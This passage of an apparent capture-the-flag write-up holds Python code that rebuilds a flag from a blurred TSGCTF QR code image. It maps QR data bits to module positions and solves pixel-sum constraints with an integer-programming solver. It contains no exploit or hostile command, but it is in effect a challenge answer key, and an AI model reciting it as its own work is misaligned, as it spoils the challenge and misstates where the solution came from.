sum(block.total_count - block.data_count for block in blocks) def acquire_data_array(version=40, error_correction=ERROR_CORRECT_L): blocks = rs_blocks(version, error_correction) dc_offset = 0 maxDcCount = 0 maxEcCount = 0 dcdata: List[List[Tuple[str, int]]] = [] ecdata: List[List[Tuple[str, int]]] = [] ec_offset = 0 for rs_block in blocks: dcCount = rs_block.data_count ecCount = rs_block.total_count - dcCount maxDcCount = max(maxDcCount, dcCount) maxEcCount = max(maxEcCount, ecCount) current_dc: List[Tuple[str, int]] = [("d", i + dc_offset) for i in range(dcCount)] dc_offset += dcCount dcdata.append(current_dc) current_ec: List[Tuple[str, int]] = [("e", i + ec_offset) for i in range(ecCount)] ec_offset += ecCount ecdata.append(current_ec) data: List[Tuple[str, int]] = [] for i in range(maxDcCount): for dc in dcdata: if i < len(dc): data.append(dc[i]) for i in range(maxEcCount): for ec in ecdata: if i < len(ec): data.append(ec[i]) return data def get_data_map(mask_pattern, version=40, error_correction=ERROR_CORRECT_L): zero, _, is_template = create_plain_img(mask_pattern, version, error_correction) cv2.imwrite(f'pattern.png', zero * 255) print(is_template) modules_count = version * 4 + 17 print(zero.shape, modules_count) inc = -1 row = modules_count - 1 bitIndex = 7 byteIndex = 0 data = acquire_data_array(version, error_correction) modules: List[List[Tuple[str, int]]] = [[("n", -1)] * modules_count for r in range(modules_count)] for i in range(modules_count): for j in range(modules_count): if is_template[i][j]: modules[i][j] = ("c", 0 if zero[i][j] else 1) for col in range(modules_count - 1, 0, -2): if col <= 6: col -= 1 col_range = (col, col - 1) while True: for c in col_range: if not is_template[row][c]: typ, byte_ind = data[byteIndex] modules[row][c] = (typ, byte_ind * 8 + 7 - bitIndex) bitIndex -= 1 if bitIndex == -1: byteIndex += 1 bitIndex = 7 row += inc if row < 0 or modules_count <= row: row -= inc inc = -inc break return modules ``` ```python= import time import cv2 from mip import Model, CBC from lib import get_byte_limit, get_data_map, get_ec_count, create_plain_img m = Model("qrcode", solver_name=CBC) def get_bit(name): return m.add_var(name, var_type="B") bit_limit = get_byte_limit() * 8 ec_bit_count = get_ec_count() * 8 flag = [*b"TSGCTF{"] + [None] * 1468 + [*b"}"] bitdata_arr = [] bitdata_arr += [0, 1, 0, 0] # mode == 4 bitdata_arr += [int(c) for c in bin(2952)[2:].zfill(16)] flag_bits = [] for i, elem in enumerate(flag): if elem is not None: flag_bits += [int(c) for c in bin(elem)[2:].zfill(8)] else: flag_bits += [0, 1] # flag content always start with 0b01... for ind in range(2, 8): flag_bits.append(get_bit(f"chr_{i}_{ind}")) bitdata_arr += flag_bits * 2 # Terminate the bits (add up to four 0s). for _ in range(min(bit_limit - len(bitdata_arr), 4)): bitdata_arr.append(0) # Delimit the string into 8-bit words, padding with 0s if necessary. delimit = len(bitdata_arr) % 8 if delimit: for _ in range(8 - delimit): bitdata_arr.append(0) # edata = [get_bit(f"ec_{i}") for i in range(ec_bit_count)] PAD0 = 0xEC PAD1 = 0x11 # Add special alternating padding bitstrings until buffer is full. bytes_to_fill = (bit_limit - len(bitdata_arr)) // 8 for i in range(bytes_to_fill): if i % 2 == 0: bitdata_arr += [1, 1, 1, 0, 1, 1, 0, 0] # 0xec == 0b11101100 else: bitdata_arr += [0, 0, 0, 1, 0, 0, 0, 1] # 0x11 == 0b00010001 BIT_PATTERN = 1 zero, _, is_template = create_plain_img(BIT_PATTERN) data_map = get_data_map(BIT_PATTERN) print(len(data_map)) PAD_LEN = 2 data_map = [[("c", 0)] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN + \ [[("c", 0)] * PAD_LEN + [*row] + [("c", 0)] * PAD_LEN for row in data_map] + \ [[("c", 0)] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN tmpl_and_mask = [[0] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN + \ [[0] * PAD_LEN + [1 if item == 0 else 0 for item in row] + [0] * PAD_LEN for row in zero] + \ [[0] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN is_template = [[True] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN + \ [[True] * PAD_LEN + [item == 1 for item in row] + [0] * PAD_LEN for row in is_template] + \ [[True] * (PAD_LEN + len(data_map) + PAD_LEN)] * PAD_LEN # cheat = cv2.imread("flag_orig.png", cv2.IMREAD_GRAYSCALE) im = cv2.imread("flag_chall.png", cv2.IMREAD_GRAYSCALE)[1:-1,1:-1] def filp(var, mask): return 1 - var if mask else var h, w = im.shape for i in range(h): for j in range(w): has_e = False sumup = 0 # cheat_sum = 0 for di in range(3): for dj in range(3): coeff = [[1,2,1], [2,4,2], [1,2,1]][di][dj] typ, val = data_map[2 * i + di][2 * j + dj] zero_val = tmpl_and_mask[2 * i + di][2 * j + dj] # cheat_sum += (1 if cheat[2 * i + di][2 * j + dj] == 0 else 0) * coeff if typ == "e": has_e = True continue if typ == "d": sumup += filp(bitdata_arr[val], zero_val) * coeff continue if typ == "c": if is_template[2 * i + di][2 * j + dj]: assert val == zero_val sumup += val * coeff else: # assert filp(val, zero_val) == (1 if cheat[2 * i + di][2 * j + dj] == 0 else 0), (2 * i + di, 2 * j + dj) sumup += filp(val, zero_val) * coeff continue assert False, (typ, val, coeff) if has_e: continue # assert cheat_sum == round((255 - im[i][j]) / 16) constr = round((255 - im[i][j]) / 16) == sumup if type(constr) == bool: assert constr continue m += (constr) print("checking...") t = time.time() m.optimize() print(time.time() - t) bin_flag = "".join([str(int(item.x) if type(item) != int else item) for item in bitdata_arr][20:][:len(flag)*2*8]) print(bin_flag) print(int(bin_flag, 2).to_bytes(len(flag)*2, "big")) print(len(im)) print(len(data_map)) ```